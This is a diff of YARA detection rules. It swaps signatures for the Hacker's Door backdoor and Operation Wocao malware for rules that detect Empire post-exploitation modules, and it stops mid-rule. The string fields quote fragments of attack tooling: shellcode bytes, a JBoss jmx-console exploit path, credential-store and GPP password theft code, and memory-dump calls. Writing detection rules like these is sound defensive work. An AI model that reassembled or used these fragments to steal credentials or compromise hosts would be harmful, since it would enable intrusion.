-		$x9 = "reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)" fullword ascii
-		$x10 = "linux_inject_main" fullword ascii
+		$s1 = "Install-SSP -Path .\\mimilib.dll" fullword ascii
 
 	condition:
-		(( uint16( 0 ) == 0x457f or uint16( 0 ) == 0x5a4d ) and filesize < 7000KB and 1 of them ) or 3 of them or ( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "84a69bce2ff6d9f866b7ae63bd70b163" )
+		( uint16( 0 ) == 0x7566 and filesize < 20KB and 1 of them ) or all of them
 }
-
-rule SIGNATURE_BASE_Hkdoor_Backdoor_Dll : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Shellcodemsil : FILE
 {
 	meta:
-		description = "Hacker's Door Backdoor DLL"
-		author = "Cylance Inc."
-		id = "470e5d37-8a5a-500f-b9b9-245b8dc2c4d7"
-		date = "2017-10-18"
+		description = "Detects Empire component - file Invoke-ShellcodeMSIL.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "06011b51-bad7-5656-ac37-e49f9b6d0498"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hkdoor.yar#L11-L30"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L91-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "77901d1f2d6c53161c79b50ef20eeb424bf1b8b32906302ca10f3c4b82a58e2a"
+		logic_hash = "eb556fb8b558145e7e981ab3c3ccfb2656512498b917c705e53bc5b9f3650155"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9a9c6c9eb67bde4a8ce2c0858e353e19627b17ee2a7215fa04a19010d3ef153f"
 
 	strings:
-		$s1 = "The version of personal hacker's door server is" fullword ascii
-		$s2 = "The connect back interval is %d (minutes)" fullword ascii
-		$s3 = "I'mhackeryythac1977" fullword ascii
-		$s4 = "Welcome to http://www.yythac.com" fullword ascii
-		$s5 = "SeLoadDriverPrivilege" fullword ascii
+		$s1 = "$FinalShellcode.Length" fullword ascii
+		$s2 = "@(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)" fullword ascii
+		$s3 = "@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57," fullword ascii
+		$s4 = "$TargetMethod.Invoke($null, @(0x11112222)) | Out-Null" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 3 of ( $s* ) ) and pe.characteristics & pe.DLL and pe.imports ( "ws2_32.dll" , "WSAStartup" ) and pe.imports ( "ws2_32.dll" , "sendto" )
+		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Hkdoor_Backdoor : FILE
+rule SIGNATURE_BASE_HKTL_Empire_Powerup : FILE
 {
 	meta:
-		description = "Hacker's Door Backdoor"
-		author = "Cylance Inc."
-		id = "470e5d37-8a5a-500f-b9b9-245b8dc2c4d7"
-		date = "2017-10-18"
+		description = "Detects Empire component - file PowerUp.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e79d093e-7481-52a3-a350-4d1b6d8955cd"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hkdoor.yar#L32-L51"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L109-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3fc71c971bf0908e044e3e0ec3f266b8dfaae33bcfbf1b10619375fc7b5e7f5e"
+		logic_hash = "d55674866a1a14d4f4c2b5529e47e005ca4b433383bf112af6da41d7f84afdb7"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
 
 	strings:
-		$s1 = "http://www.yythac.com" fullword ascii
-		$s2 = "Example:%s 192.168.1.100 139 -p yyt_hac -t 1" fullword ascii
-		$s3 = "password-----------The hacker's door's password" fullword ascii
-		$s4 = "It is the client of hacker's door %d.%d public version" fullword ascii
-		$s5 = "hkdoordll.dll" fullword ascii
-		$s6 = "http://www.yythac.com/images/mm.jpg" fullword ascii
-		$s7 = "I'mhackeryythac1977" fullword ascii
-		$s8 = "yythac.yeah.net" fullword ascii
+		$x2 = "$PoolPasswordCmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 4 of ( $s* ) )
+		( uint16( 0 ) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
 }
-
-rule SIGNATURE_BASE_Hkdoor_Dropper : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Mimikatz_Gen : FILE
 {
 	meta:
-		description = "Hacker's Door Dropper"
-		author = "Cylance Inc."
-		id = "8c8171b9-6256-591a-8f74-abac1cb9a50b"
-		date = "2018-01-01"
-		modified = "2023-01-07"
-		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hkdoor.yar#L53-L79"
+		description = "Detects Empire component - file Invoke-Mimikatz.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1f771a17-2534-5811-80bd-bc1bab37d97c"
+		date = "2016-11-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L124-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "521836ff95142d276152687f7c36e8f503f168f101976022431efd13a6adf7e4"
+		logic_hash = "a28297025b9b0178ab437996ffd3e0c28526f1edaf61db659093fe41a356cf40"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
 
 	strings:
-		$s1 = "The version of personal hacker's door server is" fullword ascii
-		$s2 = "The connect back interval is %d (minutes)" fullword ascii
-		$s3 = "I'mhackeryythac1977" fullword ascii
-		$s4 = "Welcome to http://www.yythac.com" fullword ascii
-		$s5 = "SeLoadDriverPrivilege" fullword ascii
-		$s6 = "\\drivers\\ntfs.sys" ascii
-		$s7 = "kifes" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 4 of ( $s* ) ) and pe.number_of_resources > 0 and for any i in ( 0 .. pe.number_of_resources - 1 ) : ( pe.resources [ i ] . type_string == "B\x00I\x00N\x00" and uint16( pe.resources [ i ] . offset ) == 0x5A4D ) and pe.imports ( "KERNEL32.dll" , "FindResourceW" ) and pe.imports ( "KERNEL32.dll" , "LoadResource" )
-}
-
-rule SIGNATURE_BASE_Hkdoor_Driver : FILE
-{
-	meta:
-		description = "Hacker's Door Driver"
-		author = "Cylance Inc."
-		id = "50b763a9-6d4f-59dd-ba6c-27e2ae117523"
-		date = "2018-01-01"
-		modified = "2023-01-07"
-		reference = "https://www.cylance.com/en_us/blog/threat-spotlight-opening-hackers-door.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hkdoor.yar#L81-L99"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "68ac505d67af5361f096529697e621c83a4628f21c213fcea6652905f87ebe00"
-		score = 75
-		quality = 83
-		tags = "FILE"
-
-	strings:
-		$s1 = "ipfltdrv.sys" fullword ascii
-		$s2 = "Patch Success." fullword ascii
-		$s3 = "\\DosDevices\\kifes" ascii
-		$s4 = "\\Device\\kifes" ascii
-		$s5 = {75 28 22 36 30 5b 4a 77 7b 58 4d 6c 3f 73 63 5e 38 47 7c 7d 7a 40 3a 41 2a 45 4e 44 79 64 67 6d 65 74 21 39 23 3c 20 49 43 69 4c 3b 31 57 2f 55 3e 26 59 62 61 54 53 5a 2d 25 78 35 5c 76 3d 34 27 6b 5f 72 2c 32 4f 2b 71 66 42 33 37 56 52 60 5d 29 4b 51 2e 6f 50 68 6e 6a 24 48 7e 46 70}
+		$s1 = "= \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ" ascii
+		$s2 = "Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, \"Void\", 0, \"\", $ExeArgs)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_NATIVE and ( 4 of ( $s* ) )
+		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Csharp
+rule SIGNATURE_BASE_Empire_Get_Gpppassword : FILE
 {
 	meta:
-		description = "Strings from CSharp version of Agent"
-		author = "Fox-IT SRT"
-		id = "e5212226-a82d-558d-abb4-43ad7848764e"
-		date = "2019-12-20"
+		description = "Detects Empire component - file Get-GPPPassword.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7791b009-19d3-5d08-8ef7-4723d28830ed"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L2-L22"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L140-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e77fcd2ac0c21db54563b15466962a775a5e8ef73cedb3af5cd00d5b0d615e4c"
+		logic_hash = "3c879e50805e8b89fc8f3a7c7da2c8e906c89f210ab74194daca6b0ba2d312ba"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "55a4519c4f243148a971e4860225532a7ce730b3045bde3928303983ebcc38b0"
 
 	strings:
-		$a = "mysend(client_sock, new byte[] { 0x16, 0x00 }, 2);" ascii wide
-		$b = "Dns.GetHostAddresses(sip.Remove(sip.Length - 1));" ascii wide
-		$c = "Port = 256 * buf[4] + buf[5];" ascii wide
-		$d = "Port = 256 * buf[AddrLen] + buf[AddrLen + 1];" ascii wide
-		$e = "StartTransData(CliSock" ascii wide
-		$f = "static void ForwardTransmit(object ft_data)" ascii wide
-		$key = "0x4c, 0x1b, 0x68, 0x0b, 0x6a, 0x18, 0x09, 0x41, 0x5a, 0x36, 0x1f, 0x56, 0x26, 0x2a, 0x03, 0x44, 0x7d, 0x5f, 0x03, 0x7b, 0x07, 0x6e, 0x03, 0x77, 0x30, 0x70, 0x52, 0x42, 0x53, 0x67, 0x0a, 0x2a" ascii wide
-		$key_raw = { 4c1b680b6a1809415a361f56262a03447d5f037b076e03773070524253670a2a }
+		$s1 = "$Base64Decoded = [Convert]::FromBase64String($Cpassword)" fullword ascii
+		$s2 = "$XMlFiles += Get-ChildItem -Path \"\\\\$DomainController\\SYSVOL\" -Recurse" ascii
+		$s3 = "function Get-DecryptedCpassword {" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Powershell_Dropper
+rule SIGNATURE_BASE_Empire_Invoke_Smbscanner : FILE
 {
 	meta:
-		description = "Strings from PowerShell dropper of CSharp version of Agent"
-		author = "Fox-IT SRT"
-		id = "833ce607-56a9-5580-bbd1-e72392945fec"
-		date = "2019-12-20"
+		description = "Detects Empire component - file Invoke-SmbScanner.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "63cd048b-04fd-5b4f-9d4d-3a001c31b4df"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L24-L38"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L157-L171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "19f56e69685ae8c13b9dd884f8322915835c16e2c6313f01f9fa447218419108"
+		logic_hash = "5feb32dd0fc5271256dc4a088b9b02b591dbe584759db7ee4f5a6c99f42c3c0c"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9a705f30766279d1e91273cfb1ce7156699177a109908e9a986cc2d38a7ab1dd"
 
 	strings:
-		$a = "function format([string]$source)"
-		$b = "foreach($c in $bb){$tt = $tt + [char]($c -bxor"
-		$c = "[agent]::Main($args);"
+		$s1 = "$up = Test-Connection -count 1 -Quiet -ComputerName $Computer " fullword ascii
+		$s2 = "$out | add-member Noteproperty 'Password' $Password" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Powershell_B64Encoded
+rule SIGNATURE_BASE_Empire_Exploit_Jboss : FILE
 {
 	meta:
-		description = "Piece of Base64 encoded data from Agent CSharp version"
-		author = "Fox-IT SRT"
-		id = "14e1702d-6229-5989-8bb7-cc9c0c321676"
-		date = "2019-12-20"
+		description = "Detects Empire component - file Exploit-JBoss.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a9c75cf5-9469-5a45-b750-69728ed0069f"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L40-L52"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L173-L190"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bcf9a75dbbf90044db76c56ffd07971d4252b0e75d73abf402ca4fadbfb59767"
+		logic_hash = "a0eef14c3966745a0f2b7eb404eed122a11eea2fb82884ebd2087b3ab90bff93"
 		score = 75
 		quality = 85
-		tags = ""
-
-	strings:
-		$header = "LFNVT0hBBnVfVVJDSx0sU1VPSEEGdV9VUkNLCG9pHSxTVU9IQQZ1X1VSQ0sIZUlK"
-
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Py
-{
-	meta:
-		description = "Strings from Python version of Agent"
-		author = "Fox-IT SRT"
-		id = "ca30dd6a-b596-54ab-b4f0-50e6b1382f73"
-		date = "2019-12-20"
-		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L54-L75"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9b6eba750c96501aae1d86eef458d3e80de665efc7ce9d5aff842bc44363bad2"
-		score = 75
-		quality = 60
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9ea3e00b299e644551d90bbee0ce3e4e82445aa15dab7adb7fcc0b7f1fe4e653"
 
 	strings:
-		$a = "vpshex.decode"
-		$b = "self._newsock.recv"
-		$c = "Rsock.connect"
-		$d = /MAX_DATALEN\s?=\s?10240/
-		$e = /LISTEN_MAXCOUNT\s?=\s?80/
-		$f = "ListenSock.listen(LISTEN_MAXCOUNT)"
-		$g = "nextsock.send(head)"
-		$h = "elif transnode"
-		$i = "infobuf[4:6]"
-		$key = "L\\x1bh\\x0bj\\x18\\tAZ6\\x1fV&*\\x03D}_\\x03{\\x07n\\x03w0pRBSg\\n*"
+		$s1 = "Exploit-JBoss" fullword ascii
+		$s2 = "$URL = \"http$($SSL)://\" + $($Rhost) + ':' + $($Port)" ascii
+		$s3 = "\"/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" ascii
+		$s4 = "http://blog.rvrsh3ll.net" fullword ascii
+		$s5 = "Remote URL to your own WARFile to deploy." fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Py_B64Encoded
+rule SIGNATURE_BASE_Empire_Dumpcredstore : FILE
 {
 	meta:
-		description = "Piece of Base64 encoded data from Agent Python version"
-		author = "Fox-IT SRT"
-		id = "eb2701e9-4358-5d24-bfcd-b4dde24f13bf"
-		date = "2019-12-20"
+		description = "Detects Empire component - file dumpCredStore.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cdb87ed4-fa90-5724-b37d-97cf8e4b8326"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L77-L89"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L192-L207"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "279fb27637d9b62b484283f778215d042de9fb83110a233e048452e921c540ee"
+		logic_hash = "7136920e531d7ab621e743c5c89c0d817fe453108878e3c808814ca48ad57fb3"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c1e91a5f9cc23f3626326dab2dcdf4904e6f8a332e2bce8b9a0854b371c2b350"
 
 	strings:
-		$header = "QlpoOTFBWSZTWWDdHjgABDTfgHwQe////z/v/9+////6YA4cGPsAl2e8M9LSU128"
+		$x1 = "[DllImport(\"Advapi32.dll\", SetLastError = true, EntryPoint = \"CredReadW\"" ascii
+		$s12 = "[String] $Msg = \"Failed to enumerate credentials store for user '$Env:UserName'\"" fullword ascii
+		$s15 = "Rtn = CredRead(\"Target\", CRED_TYPE.GENERIC, out Cred);" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x233c and filesize < 40KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Keylogger_Py
+rule SIGNATURE_BASE_Empire_Invoke_Egresscheck : FILE
 {
 	meta:
-		description = "Strings from Python keylogger"
-		author = "Fox-IT SRT"
-		id = "f7b5ec1b-669e-5e7d-a9d3-011d212eb363"
-		date = "2019-12-20"
+		description = "Detects Empire component - file Invoke-EgressCheck.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "21e09250-6853-5743-a6ef-aa6be8091d33"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L91-L107"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L209-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2dc2ce153d559d795f302f5ca4a9ef9e6e5c54762472e38e6f4a26ef8a28a184"
+		logic_hash = "693564e0bd98ebd03cd433d8ba1003051a5cf6b1f0c05d3c5a4682e6d667327e"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e2d270266abe03cfdac66e6fc0598c715e48d6d335adf09a9ed2626445636534"
 
 	strings:
-		$a = "c:\\windows\\temp\\tap.tmp"
-		$b = "c:\\windows\\temp\\mrteeh.tmp"
-		$c = "GenFileName"
-		$d = "outfile"
-		$e = "[PASTE:%d]"
+		$s1 = "egress -ip $ip -port $c -delay $delay -protocol $protocol" fullword ascii
 
 	condition:
-		3 of them
+		( uint16( 0 ) == 0x233c and filesize < 10KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Keylogger_File
+rule SIGNATURE_BASE_Empire_Reflectivepick_X64_Orig : FILE
 {
 	meta:
-		description = "Rule for finding keylogger output files"
-		author = "Fox-IT SRT"
-		id = "22e866b3-4b02-593a-b9a6-aa86870b6509"
-		date = "2019-12-20"
-		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L109-L121"
+		description = "Detects Empire component - file ReflectivePick_x64_orig.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cd69a149-d881-5f93-9647-84241bd96ba5"
+		date = "2016-11-05"
+		modified = "2022-12-21"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L224-L240"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6d2d677b69eaf31843e8352bfe040c9e5a8d423d17900e022b769d28789f2d98"
+		logic_hash = "a87c5f1da9c490887cba5e9837ca40ac92b63d8c36b682f4be770ac061b5acdf"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "a8c1b108a67e7fc09f81bd160c3bafb526caf3dbbaf008efb9a96f4151756ff2"
 
 	strings:
-		$a = { 0d 0a 20 [3-10] 53 74 61 72 74 75 70 3a 20 [3] 20 [3] 20 [2] 20 [2] 3a [2] 3a [2] 20 }
+		$a1 = "\\PowerShellRunner.pdb" ascii
+		$a2 = "PowerShellRunner.dll" fullword wide
+		$s1 = "ReflectivePick" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of ( $a* ) and $s1
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Xserver_Csharp
+rule SIGNATURE_BASE_Empire_Out_Minidump : FILE
 {
 	meta:
-		description = "Strings from the CSharp version of XServer"
-		author = "Fox-IT SRT"
-		id = "48f4c88d-fb56-54ca-84e2-38f88804a50f"
-		date = "2019-12-20"
+		description = "Detects Empire component - file Out-Minidump.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8c53d2ab-afc5-5d7b-97e1-496425b9664f"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L123-L141"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L242-L256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1201ee45df78cf3aec4b4bbb59cb7e4a70af6928895bb7c968ef02075a963405"
+		logic_hash = "7ce4ac95ac942a2ad758b1d9034e6ec50d25d195ba1c2ae95a90a7490708e485"
 		score = 75
 		quality = 85
-		tags = ""
-
-	strings:
-		$a = "static void ServerX(int ListenPort)" ascii wide
-		$b = "public class xserver" ascii wide
-		$c = "[xserver]::Main($args);" ascii wide
-		$d = "add rule name=powershell dir=in localport=47000 action=allow" ascii wide
-		$e = "string TempFile = file_path + \".CT\";" ascii wide
-		$f = "Port = 256 * RecvBuf[AddrLen + 5] + RecvBuf[AddrLen + 6];"
-		$g = "CliSock.Send(new byte[] { 0x05, 0x00 });"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1"
+
+	strings:
+		$s1 = "$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle," fullword ascii
+		$s2 = "$ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Xserver_Powershell_B64Encoded
+rule SIGNATURE_BASE_Empire_Invoke_Psexec : FILE
 {
 	meta:
-		description = "Piece of Base64 encoded data from the XServer PowerShell dropper"
-		author = "Fox-IT SRT"
-		id = "01e38cfb-b245-5398-b037-6d1d2fb726ee"
-		date = "2019-12-20"
+		description = "Detects Empire component - file Invoke-PsExec.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "19aaec3e-3e8f-5d7d-9c70-a212756c0300"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_wocao.yar#L143-L155"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L258-L273"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "77315f0fc8387fa87892fc8fcea1f6e8a95560049aaa9a87519859020d0a7a3e"
+		logic_hash = "86af63a3be5b4940966932b129edbe4cca5ac1a31d120ba44fdca739e9c97ad4"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
 
 	strings:
-		$header_47000 = "5T39c9u2kr/nr2A0Ny2VKIzkfLRJntuJHafPN/nwWG777rUZDy3BNq8UqSEpx26b"
-		$header_25667 = "5T1rc9u2st/zKxjNmZZKFEZyErdJ6nZsx+nxnTjxWGp77mkzHlqCbd5SpIak/Gjr"
+		$s1 = "Invoke-PsExecCmd" fullword ascii
+		$s2 = "\"[*] Executing service .EXE" fullword ascii
+		$s3 = "$cmd = \"%COMSPEC% /C echo $Command ^> %systemroot%\\Temp\\" ascii
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x7566 and filesize < 50KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Xserver_Powershell_Dropper
+rule SIGNATURE_BASE_Empire_Invoke_Postexfil : FILE
 {
 	meta:
-		description = "Strings from the PowerShell dropper of XServer"
-		author = "Fox-IT SRT"
-		id = "97169ab4-d68d-5137-83de-d9cac975747e"
-		date = "2019-12-20"
+		description = "Detects Empire component - file Invoke-PostExfil.ps1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "58d9e057-efde-56ab-9b7e-982342a910e2"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
